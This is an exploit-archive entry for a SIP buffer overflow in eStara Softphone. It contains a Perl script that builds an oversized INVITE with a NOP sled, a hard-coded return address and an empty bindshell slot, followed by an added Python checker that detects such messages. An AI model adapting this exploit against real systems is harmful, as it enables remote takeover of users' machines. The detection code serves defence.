eStara Softphone <= (SIP) Remote Buffer Overflow Exploit (2)

ID 1337DAY-ID-8660
Type zdt
Reporter kokanin
Modified 2006-01-12T00:00:00


Exploit for unknown platform in category remote exploits

eStara Softphone <= (SIP) Remote Buffer Overflow Exploit (2)

#!/usr/bin/perl -s
# by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info =
# kokanin did the research, did the encoded bindshell on tcp/5060
# Let's face it, most users won't know the difference between tcp and udp even
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
# again, provided by (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket;
{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
my $buflen = 4099;

my $shellcode = "";  # placeholder: the encoded win32_bind payload is not reproduced in this listing

my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;

my $sipinvite = 

"INVITE sip:snotboble\ SIP/2.0\r\n".
"Via: SIP/2.0/UDP;branch=somebranchidhere\r\n".
"From: 2448 <sip:kagemand\>;tag=2448\r\n".
"To: Receiver <sip:snotboble\>\r\n".
"Call-ID: 0\\r\n".
"CSeq: 1 INVITE\r\n".
"Contact: 2448 <sip:kagemand\>\r\n".
"Expires: 1200\r\n".
"Max-Forwards: 70\r\n".
"Content-Type: application/sdp\r\n".
"Content-Length: 4234\r\n".
$buffer . 
"o=2448 2448 2448 IN IP4 " . $ret . "\r\n".
"s=Session SDP\r\n".
"c=IN IP4\r\n".
"t=0 0\r\n".
"m=audio 9876 RTP/AVP 0\r\n".
"a=rtpmap:0 PCMU/8000\r\n";
$host = $ARGV[0];
$port = 5060;

$socket = IO::Socket::INET->new(
Proto    => "udp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket $sipinvite; 
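From the defensive side, the INVITE built above has features a SIP-aware sensor can key on: thousands of bytes glued straight onto the Content-Length header with no blank line before the body, a long run of 0x90 padding, and an o= line whose IP4 address field is raw binary. The following Python checker is added here and is not part of kokanin's script; its thresholds, its sample messages and the four placeholder address bytes are assumptions, not values from this listing.

```python
import re

# Assumed thresholds (not from the advisory): legitimate SIP header and SDP lines are
# short, and a long run of 0x90 (x86 NOP) bytes has no business in signalling traffic.
MAX_LINE_BYTES = 1024
NOP_SLED_MIN = 64
CRLF = b"\r\n"
ADDR_OK = re.compile(rb"[0-9A-Za-z.:\-]+")  # printable address text after "IN IP4 "

def inspect_sip_datagram(data: bytes) -> list:
    """Return findings for one UDP SIP datagram; an empty list means nothing suspicious."""
    findings = []
    head, sep, body = data.partition(CRLF + CRLF)
    if not sep:
        findings.append("no blank line separating SIP headers from the body")
    for n, line in enumerate(data.split(CRLF)):
        if len(line) > MAX_LINE_BYTES:
            findings.append(f"line {n} is {len(line)} bytes long")
        if b"\x90" * NOP_SLED_MIN in line:
            findings.append(f"line {n} contains a run of {NOP_SLED_MIN}+ 0x90 bytes")
        at = line.find(b"IN IP4 ")  # SDP o= and c= lines end in an address field
        if at != -1 and not ADDR_OK.fullmatch(line[at + 7:]):
            findings.append(f"line {n} has non-printable bytes in its IP4 address field")
    m = re.search(rb"^Content-Length:\s*(\d+)\s*$", head, re.I | re.M)
    if m and sep and int(m.group(1)) != len(body):
        findings.append(f"Content-Length {int(m.group(1))} != body length {len(body)}")
    return findings

# Constructed sample messages (not captured traffic).
_HEAD = (b"INVITE sip:bob@example.net SIP/2.0\r\n"
         b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776\r\n"
         b"From: Alice <sip:alice@example.net>;tag=1928\r\n"
         b"To: Bob <sip:bob@example.net>\r\n"
         b"Call-ID: a84b4c76e66710\r\nCSeq: 1 INVITE\r\n"
         b"Content-Type: application/sdp\r\n")
_SDP = (b"v=0\r\no=alice 2890844526 2890844526 IN IP4 192.0.2.10\r\n"
        b"s=Session SDP\r\nc=IN IP4 192.0.2.10\r\nt=0 0\r\n"
        b"m=audio 49170 RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\n")
BENIGN_INVITE = _HEAD + b"Content-Length: %d\r\n\r\n" % len(_SDP) + _SDP
# Same layout as the message in the listing: ~4 KB of 0x90 padding glued onto the
# Content-Length header with no blank line, then an o= line whose address field is
# four binary bytes (a stand-in for the packed return address; no shellcode included).
OVERFLOW_INVITE = (_HEAD + b"Content-Length: 4234\r\n" + b"\x90" * 4099
                   + b"o=2448 2448 2448 IN IP4 " + b"\x01\x02\x03\x04" + CRLF
                   + b"s=Session SDP\r\nt=0 0\r\n")

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN_INVITE), ("overflow", OVERFLOW_INVITE)):
        print(name, inspect_sip_datagram(msg) or "clean")
```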

